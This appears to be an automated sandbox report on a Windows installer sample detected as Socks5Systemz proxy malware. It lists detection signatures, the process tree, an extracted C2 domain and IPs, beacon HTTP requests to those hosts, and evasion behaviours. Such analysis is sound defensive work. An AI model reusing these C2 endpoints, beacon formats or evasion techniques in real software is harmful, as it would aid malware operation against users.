Windows Analysis Report
AGcC2uK0El.exe

Overview

General Information

Sample name: AGcC2uK0El.exe (renamed because original name is a hash value)
Original sample name: 3ec3e60970e2d0d38df3b5e571e8514d.exe
Analysis ID: 1575089
MD5: 3ec3e60970e2d0d38df3b5e571e8514d
SHA1: e2c9975f6fda0cbbfaa434e25b6645450cb926ea
SHA256: 113106967e66077d88c8cf6dae8170d74479b3c4f7a2fc284719eb39cef28ce8
Tags: exe, Socks5Systemz, user-abuse_ch

Detection

Petite Virus, Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Petite Virus
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
PE file has nameless sections
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • AGcC2uK0El.exe (PID: 5512 cmdline: "C:\Users\user\Desktop\AGcC2uK0El.exe" MD5: 3EC3E60970E2D0D38DF3B5E571E8514D)
    • AGcC2uK0El.tmp (PID: 3356 cmdline: "C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp" /SL5="$10480,7025884,54272,C:\Users\user\Desktop\AGcC2uK0El.exe" MD5: F448D7F4B76E5C9C3A4EAFF16A8B9B73)
      • schtasks.exe (PID: 6776 cmdline: "C:\Windows\system32\schtasks.exe" /Query MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crtgame.exe (PID: 6544 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -i MD5: 3362BAC458070E33D0CABCDA1E4B735C)
      • net.exe (PID: 6620 cmdline: "C:\Windows\system32\net.exe" helpmsg 10 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 7064 cmdline: C:\Windows\system32\net1 helpmsg 10 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • crtgame.exe (PID: 7156 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -s MD5: 3362BAC458070E33D0CABCDA1E4B735C)
  • cleanup
Malware configuration: {"C2 list": ["gpatxul.com"]}
Yara matches (dropped files)

Source | Rule | Description | Author
C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-PJ8MN.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security

Yara matches (process memory)

Source | Rule | Description | Author
00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
00000007.00000002.3300804778.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
Process Memory Space: crtgame.exe PID: 7156 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security

No Sigma rule has matched
Suricata alerts (SID 2049467)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T12:03:18.946257+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49818 | 94.232.249.187 | 80 | TCP
2024-12-14T12:03:32.086598+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49849 | 94.232.249.187 | 80 | TCP
2024-12-14T12:03:45.242156+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49879 | 94.232.249.187 | 80 | TCP
2024-12-14T12:03:51.955829+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49911 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:55.782950+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49911 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:57.296460+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49923 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:58.928983+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49929 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:00.442523+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49935 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:01.954791+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49937 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:03.481805+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49942 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:05.048266+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49948 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:06.703781+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49951 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:08.238263+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49955 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:09.749286+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49961 | 185.237.206.129 | 80 | TCP

Suricata alerts (SID 2049468)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T12:03:18.946257+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49818 | 94.232.249.187 | 80 | TCP
2024-12-14T12:03:32.086598+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49849 | 94.232.249.187 | 80 | TCP
2024-12-14T12:03:45.242156+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49879 | 94.232.249.187 | 80 | TCP
2024-12-14T12:03:51.955829+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49911 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:55.782950+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49911 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:57.296460+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49923 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:58.928983+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49929 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:00.442523+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49935 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:01.954791+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49937 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:03.481805+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49942 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:05.048266+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49948 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:06.703781+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49951 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:08.238263+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49955 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:09.749286+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49961 | 185.237.206.129 | 80 | TCP

                  AV Detection

Source: AGcC2uK0El.exe | Avira: detected
Source: crtgame.exe.7156.7.memstrmin | Malware Configuration Extractor: Socks5Systemz {"C2 list": ["gpatxul.com"]}
Source: AGcC2uK0El.exe | Virustotal: Detection: 58%
Source: AGcC2uK0El.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0045C8A8 GetProcAddress, GetProcAddress, GetProcAddress, ISCryptGetVersion, 1_2_0045C8A8
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0045C95C ArcFourCrypt, 1_2_0045C95C
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0045C974 ArcFourCrypt, 1_2_0045C974
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_10001000 ISCryptGetVersion, 1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_10001130 ArcFourCrypt, 1_2_10001130

                  Compliance

Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Unpacked PE file: 5.2.crtgame.exe.400000.0.unpack
Source: AGcC2uK0El.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb | source: is-ODQUV.tmp.1.dr
Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb | source: is-GN0SC.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_004520C0 FindFirstFileA, GetLastError, 1_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_00473F08 FindFirstFileA, FindNextFileA, FindClose, 1_2_00473F08
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_00496568 FindFirstFileA, SetFileAttributesA, FindNextFileA, FindClose, 1_2_00496568
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_00463404 SetErrorMode, FindFirstFileA, FindNextFileA, FindClose, SetErrorMode, 1_2_00463404
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_00463880 SetErrorMode, FindFirstFileA, FindNextFileA, FindClose, SetErrorMode, 1_2_00463880
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_00461E78 FindFirstFileA, FindNextFileA, FindClose, 1_2_00461E78

                  Networking

Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49818 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49818 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49849 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49849 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49879 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49955 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49935 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49935 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49879 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49911 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49955 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49937 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49937 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49911 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49923 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49923 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49929 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49929 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49951 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49951 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49948 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49948 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49942 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49961 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49942 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49961 -> 185.237.206.129:80
Source: Malware configuration extractor | URLs: gpatxul.com
Source: global traffic | TCP traffic: 192.168.2.5:49914 -> 46.8.225.74:2023
Source: Joe Sandbox View | ASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
Source: Joe Sandbox View | ASN Name: ITLDC-NLUA ITLDC-NLUA
Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1 Host: bmpkywz.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1 Host: gpatxul.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1 Host: gpatxul.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.225.74
Source: unknown | UDP traffic detected without corresponding DNS query: 194.49.94.194
Source: unknown | UDP traffic detected without corresponding DNS query: 152.89.198.214
Source: unknown | UDP traffic detected without corresponding DNS query: 81.31.197.38
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02C42B95 WSASetLastError, WSARecv, WSASetLastError, select, 7_2_02C42B95
Source: global traffic | DNS traffic detected: DNS query: bmpkywz.com
Source: global traffic | DNS traffic detected: DNS query: gpatxul.com
Source: crtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.237.206.129/
Source: crtgame.exe, 00000007.00000002.3299995322.0000000000902000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.0000000000948000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde
Source: crtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3299995322.0000000000948000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde
Source: crtgame.exe, 00000007.00000002.3299995322.0000000000902000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.237.206.129/en-GB
Source: crtgame.exe, 00000007.00000002.3299995322.0000000000902000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.232.249.187/
Source: crtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde2
Source: is-DTLCM.tmp.1.dr | String found in binary or memory: http://LosslessAudio.org/0
Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.dr | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
Source: is-ODQUV.tmp.1.dr | String found in binary or memory: http://code.google.com/p/mp4v2D
Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.dr | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.dr | String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                  Source: is-GN0SC.tmp.1.drString found in binary or memory: http://lame.sf.net
                  Source: is-GN0SC.tmp.1.drString found in binary or memory: http://lame.sf.net32bits
                  Source: is-6S6NV.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.dr, is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0Q
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: AGcC2uK0El.tmp, AGcC2uK0El.tmp, 00000001.00000000.2055415237.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AGcC2uK0El.tmp.0.dr, is-785C0.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                  Source: is-GN0SC.tmp.1.drString found in binary or memory: http://www.mp3dev.org/
                  Source: is-GN0SC.tmp.1.drString found in binary or memory: http://www.mp3dev.org/ID3Error
                  Source: is-JISVL.tmp.1.drString found in binary or memory: http://www.mpg123.de
                  Source: AGcC2uK0El.exe, 00000000.00000003.2054765577.0000000002380000.00000004.00001000.00020000.00000000.sdmp, AGcC2uK0El.exe, 00000000.00000003.2054950745.0000000002088000.00000004.00001000.00020000.00000000.sdmp, AGcC2uK0El.tmp, AGcC2uK0El.tmp, 00000001.00000000.2055415237.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AGcC2uK0El.tmp.0.dr, is-785C0.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                  Source: AGcC2uK0El.exe, 00000000.00000003.2054765577.0000000002380000.00000004.00001000.00020000.00000000.sdmp, AGcC2uK0El.exe, 00000000.00000003.2054950745.0000000002088000.00000004.00001000.00020000.00000000.sdmp, AGcC2uK0El.tmp, 00000001.00000000.2055415237.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AGcC2uK0El.tmp.0.dr, is-785C0.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                  Source: is-E5NVS.tmp.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: is-H6A9P.tmp.1.drString found in binary or memory: https://gcc.gnu.org/bugs/):
                  Source: is-ODQUV.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn
                  Source: is-ODQUV.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunk
                  Source: is-ODQUV.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunkrepository
                  Source: is-ODQUV.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svnrepository
                  Source: is-CHRTV.tmp.1.dr, is-2V0OO.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: is-5JD36.tmp.1.drString found in binary or memory: https://streams.videolan.org/upload/
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: is-RGK44.tmp.1.dr, is-RJI5O.tmp.1.drString found in binary or memory: https://www.ssl.com/repository0

                  System Summary

                  Source: is-ULG4P.tmp.1.dr Static PE information: section name:
                  Source: is-ULG4P.tmp.1.dr Static PE information: section name:
                  Source: is-EATSP.tmp.1.dr Static PE information: section name:
                  Source: is-EATSP.tmp.1.dr Static PE information: section name:
                  Source: is-JORH4.tmp.1.dr Static PE information: section name:
                  Source: is-JORH4.tmp.1.dr Static PE information: section name:
                  Source: is-RGK44.tmp.1.dr Static PE information: section name:
                  Source: is-6ND5B.tmp.1.dr Static PE information: section name:
                  Source: is-6ND5B.tmp.1.dr Static PE information: section name:
                  Source: is-PJ8MN.tmp.1.dr Static PE information: section name:
                  Source: is-PJ8MN.tmp.1.dr Static PE information: section name:
                  Source: is-RJI5O.tmp.1.dr Static PE information: section name:
                  Source: is-JU8A8.tmp.1.dr Static PE information: section name:
                  Source: is-JU8A8.tmp.1.dr Static PE information: section name:
                  Source: is-JU8A8.tmp.1.dr Static PE information: section name:
                  Source: is-930UV.tmp.1.dr Static PE information: section name:
                  Source: is-930UV.tmp.1.dr Static PE information: section name:
                  Source: is-8DLTN.tmp.1.dr Static PE information: section name:
                  Source: is-8DLTN.tmp.1.dr Static PE information: section name:
                  Source: is-8DLTN.tmp.1.dr Static PE information: section name:
                  Source: is-M07BP.tmp.1.dr Static PE information: section name:
                  Source: is-M07BP.tmp.1.dr Static PE information: section name:
                  Source: is-FBHNA.tmp.1.dr Static PE information: section name:
                  Source: is-FBHNA.tmp.1.dr Static PE information: section name:
                  Source: is-5QDBA.tmp.1.dr Static PE information: section name:
                  Source: is-5QDBA.tmp.1.dr Static PE information: section name:
                  Source: is-5QDBA.tmp.1.dr Static PE information: section name:
                  Source: is-IM6II.tmp.1.dr Static PE information: section name:
                  Source: is-IM6II.tmp.1.dr Static PE information: section name:
